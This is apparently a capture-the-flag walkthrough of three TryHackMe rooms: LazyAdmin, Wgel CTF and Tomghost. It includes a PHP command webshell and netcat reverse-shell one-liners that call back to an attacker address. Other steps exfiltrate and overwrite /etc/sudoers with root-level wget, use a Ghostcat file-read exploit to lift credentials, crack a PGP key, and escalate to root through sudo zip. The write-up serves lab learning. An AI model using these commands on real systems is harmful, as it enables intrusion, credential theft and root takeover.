Write-up: TryHackMe (easy) -- LazyAdmin, Wgel CTF, Tomghost

lazyadmin

lazyadmin

# nmap options used below
#   -F    fast scan: top 100 ports only (good first pass, then -sV on the few open ones)
#   -sV   service/version detection on the open ports
#   -sn   host discovery only (no port scan) -- it disables port scanning, so -sV has no effect when combined with it; do not mix `-sn` and `-sV`

Browser add-on: HackTools (reverse-shell / payload generator used below)

View the page source in the browser (Ctrl+U) -- check HTML comments for leaked usernames and paths

❯ nmap 10.10.136.56 -p80 -sV
...
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))


❯ nmap 10.10.136.56 -F
...
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http

dirb http://10.10.136.56/

URL_BASE: http://10.10.136.56/
http://10.10.136.56/content/
+ http://10.10.136.56/index.html (CODE:200|SIZE:11321)
+ http://10.10.136.56/server-status (CODE:403|SIZE:278)
==> DIRECTORY: http://10.10.136.56/content/_themes/
==> DIRECTORY: http://10.10.136.56/content/as/
==> DIRECTORY: http://10.10.136.56/content/attachment/
==> DIRECTORY: http://10.10.136.56/content/images/
==> DIRECTORY: http://10.10.136.56/content/inc/
+ http://10.10.136.56/content/index.php (CODE:200|SIZE:2199)
==> DIRECTORY: http://10.10.136.56/content/js/
(Possible cause: COULDNT CONNECT)

# /content/inc/ (from the dirb listing above) exposes a SQL backup file
# it contains the CMS admin user "manager" together with a password hash
# CrackStation (lookup of unsalted hashes) resolves the hash to: Password123
# -> log in to the CMS admin area with these (try /content/as/ from the dirb output)

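<?php
// Minimal command webshell to plant on the target once CMS admin access is gained (CTF use only:
// it hands unauthenticated command execution as the web-server user to anyone who can reach the
// URL, so remove it when done). Usage: http://TARGET/path/shell.php?cmd=id
// Guard added: without ?cmd= the original complained about the missing index and still called
// system(); now it simply does nothing.
if (isset($_GET["cmd"])) {
    system($_GET["cmd"]);
}
?>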

sudo -l

# reverse-shell one-liner (generated on revshells.com), URL-encoded so it survives the ?cmd= query string; start `nc -lvnp 5555` on the attacker box (10.9.0.78) before requesting it
# rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%2010.9.0.78%205555%20%3E%2Ftmp%2Ff

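# --- on the target (www-data shell) ---
# sudo -l shows backup.pl may be run as root through perl; it appears to invoke /etc/copy.sh.
# Confirm before overwriting anything: `cat /home/itguy/backup.pl` (what it really executes) and
# `ls -l /etc/copy.sh` (it must be writable by the current user for this to work).
cat /etc/copy.sh
# expected content after our overwrite -- a second reverse shell to the attacker box on 5554
# (a different port from the first shell so the two listeners do not collide):
#   rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.0.78 5554 >/tmp/f

# --- on the attacker box, BEFORE triggering ---
# catch the root shell (typo fixed: the bind address ended in a stray "l", which makes nc fail)
rlwrap nc -lvnp 5554 -s 10.9.0.78

# --- back on the target ---
# run the script as root; it executes /etc/copy.sh and our payload connects back as root
sudo /usr/bin/perl /home/itguy/backup.pl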

Wgel CTF

wgelctf

❯ nmap 10.10.120.10 -F
...
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
❯ nmap 10.10.120.10 -sV -p80
...
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
...

The page source (Ctrl+U) leaks a username: Jessie -- note the capital J, see the ssh step below

❯ gobuster dir --url http://10.10.120.10/ --wordlist /usr/share/dirb/wordlists/big.txt
...
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/server-status (Status: 403) [Size: 277]
/sitemap (Status: 301) [Size: 314] [--> http://10.10.120.10/sitemap/]
...
❯ gobuster dir -u http://10.10.120.10/sitemap/ -w /usr/share/dirb/wordlists/big.txt
...
/.htpasswd (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/.ssh (Status: 301) [Size: 319] [--> http://10.10.120.10/sitemap/.ssh/]
/css (Status: 301) [Size: 318] [--> http://10.10.120.10/sitemap/css/]
/fonts (Status: 301) [Size: 320] [--> http://10.10.120.10/sitemap/fonts/]
/images (Status: 301) [Size: 321] [--> http://10.10.120.10/sitemap/images/]
/js (Status: 301) [Size: 317] [--> http://10.10.120.10/sitemap/js/]
...
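# id_rsa is a private key served by the web server (presumably fetched from the /sitemap/.ssh/
# directory found above) -- a private key inside the document root is the finding here.
# ssh refuses a key file that is group/world-readable, so tighten it before use.
chmod 600 id_rsa
# Linux usernames are case-sensitive: the page source says "Jessie", the account is "jessie".
# ssh -i id_rsa Jessie@10.10.120.10    # fails -- no such user
ssh -i id_rsa jessie@10.10.120.10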

jessie@CorpOne:~$ sudo -l
...
(ALL : ALL) ALL
(root) NOPASSWD: /usr/bin/wget

Look up wget under the "sudo" section on GTFOBins.

Plan: root-level wget can read any file and post it to us (--post-file), and can overwrite any file (-O). Exfiltrate /etc/sudoers, edit it locally, serve it back and overwrite it. Caveat: a syntax error in the uploaded sudoers breaks sudo for everyone and locks you out of this privesc -- validate the edited copy with `visudo -c -f sudoers` before serving it. (The simpler route on this box is to --post-file /root/root.txt directly.)

wget

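# --- on the attacker box: catch the posted file (wget sends it as an HTTP POST body; strip the headers) ---
nc -lvnp 4444 > sudoers.posted

# --- on the target, as jessie: sudo is required -- /etc/sudoers is mode 0440 root:root and only the
#     NOPASSWD root-level wget can read it (the original line lacked sudo and used unset placeholders) ---
sudo wget --post-file=/etc/sudoers http://hostip:4444/

# --- on the attacker box: edit the copy (e.g. add "jessie ALL=(ALL) NOPASSWD: ALL"), then VALIDATE it.
#     A malformed sudoers breaks sudo entirely on the target, so this step is not optional. ---
visudo -c -f sudoers
python -m http.server            # serves the current directory on port 8000

# --- on the target: overwrite sudoers as root (again needs sudo, otherwise /etc/sudoers is not writable) ---
sudo wget http://hostip:8000/sudoers -O /etc/sudoers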

tomghost

tomghost

❯ nmap 10.10.189.103 -F
22/tcp open ssh
53/tcp open domain
8009/tcp open ajp13
8080/tcp open http-proxy


❯ nmap 10.10.189.103 -p 8080,8009 -sV
...
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.30

# gobuster on 8080 only finds the stock Tomcat paths (/docs, /examples, /manager); /manager wants credentials we do not have yet, so the HTTP side is a dead end -- the AJP port 8009 is the interesting one
❯ gobuster dir -u http://10.10.189.103:8080/ -w /usr/share/dirb/wordlists/big.txt
...
/[ (Status: 400) [Size: 762]
/] (Status: 400) [Size: 762]
/docs (Status: 302) [Size: 0] [--> /docs/]
/examples (Status: 302) [Size: 0] [--> /examples/]
/favicon.ico (Status: 200) [Size: 21630]
/manager (Status: 302) [Size: 0] [--> /manager/]
/plain] (Status: 400) [Size: 762]
/quote] (Status: 400) [Size: 762]
...
# searchsploit for Tomcat 9.0.30 / AJP turns up 48143: the CVE-2020-1938 "Ghostcat" AJP file-read exploit (Tomcat before 9.0.31 with the AJP connector reachable from the network); copy it locally with `searchsploit -m 48143` and use it to read WEB-INF/web.xml
❯ python2 48143.py -f WEB-INF/web.xml -p 8009 10.10.189.103
Getting resource at ajp13://10.10.189.103:8009/asdf
----------------------------
<?xml version="1.0" encoding="UTF-8"?>
...
skyfuck:8730281lkjlkjdqlksalks
...
</web-app>

# ssh in as skyfuck with the password lifted from web.xml (credentials sitting in a Tomcat config file that Ghostcat reads without authentication -- the root cause on this box)
# flag1: merlin's user.txt is readable by skyfuck
skyfuck@ubuntu:~$ cat /home/merlin/user.txt

# SUID sweep (command taken from HackTools) -- only stock binaries show up, so no quick win here, but it is always worth checking
skyfuck@ubuntu:~$ find / -user root -perm /4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/vmware-user-suid-wrapper
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/bin/mount
/bin/ping
/bin/umount
/bin/fusermount
/bin/su
/bin/ping6

# copy everything in skyfuck's home to the attacker box: a PGP private key (tryhackme.asc) and an encrypted credential file (credential.pgp)
❯ scp 'skyfuck@10.10.189.103:/home/skyfuck/*' .

❯ gpg2john tryhackme.asc > hash

❯ john ./hash --wordlist=/usr/share/wordlists/passwords/rockyou.txt
...
alexandru (tryhackme)
...

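# Import the private key into YOUR keyring -- no sudo: `sudo gpg --import` puts the key into root's
# keyring, where the unprivileged `gpg -d` below cannot find it (the sudo was probably left over from
# running openvpn). gpg will ask for the passphrase john recovered above (alexandru).
# Delete the key again when done with the box: gpg --delete-secret-keys <keyid>
gpg --import tryhackme.asc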

❯ gpg -d credential.pgp
...
merlin:password    (the trailing % is most likely zsh's missing-newline marker, not part of the password)

❯ ssh merlin@10.10.189.103
merlin@ubuntu:~$ sudo -l
...
(root : root) NOPASSWD: /usr/bin/zip


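# GTFOBins again (zip, sudo section): -T tells zip to test the archive and -TT supplies the command
# used for that test; the command inherits sudo's root privileges, and the trailing "#" comments out
# the archive path zip appends, so 'sh #' drops us into a root shell. /etc/hosts is just any readable
# file to put into the archive.
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
# housekeeping (after exiting the root shell): the archive was created by root, so remove it with sudo
sudo rm $TF


# flag2 -- the spawned shell keeps the current working directory (merlin's home), so use the absolute path
cat /root/root.txt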